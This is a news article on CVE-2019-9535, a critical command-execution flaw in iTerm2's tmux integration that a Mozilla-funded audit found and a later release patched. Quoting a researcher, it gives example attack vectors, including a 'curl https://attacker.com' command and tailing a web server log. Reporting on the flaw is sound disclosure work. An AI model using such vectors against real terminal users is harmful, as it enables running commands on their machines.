The flaw was discovered during an audit sponsored by Mozilla, the company behind the Firefox browser. As for the purpose of iTerm2, the application is nearly identical to the native Terminal macOS app, and is a replacement for Terminal and the successor to iTerm.
CVE-2019-9535 – A Critical Security Vulnerability in iTerm2
A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat, said Mozilla’s Tom Ritter in a blog post detailing the issue.
The vulnerability was discovered in the tmux integration feature of iTerm2. The worst part is that it has been there for at least 7 years. It should be noted that the issue may not be that easy to exploit as it requires user interact. Nonetheless, the fact that it can be exploited by commands makes it dangerous enough.
In short, CVE-2019-9535 is considered a serious security issue as it could allow an attacker to execute commands on a user’s machine when they are viewing a file or receiving input crafted in iTerm2.
All users, such as developers and administrators, of iTerm2 are urged to update as soon as possible to the latest version of the app (3.3.6).
According to Ritter, “an attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.” Attack vectors include connecting to an attacker-controlled SSH server or commands such as curl https://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples, the researcher added.
The patch should be applied immediately, as it can be exploited in unknown ways, researchers warn.